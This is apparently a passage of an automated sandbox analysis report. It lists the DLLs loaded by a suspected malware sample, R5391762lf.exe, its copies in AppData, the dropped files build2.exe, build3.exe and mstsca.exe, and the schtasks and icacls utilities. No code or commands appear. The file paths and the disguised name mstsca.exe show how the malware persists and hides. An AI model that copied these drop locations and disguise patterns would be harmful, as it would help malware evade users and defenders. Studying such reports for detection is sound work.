Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Section loaded: winnsi.dll
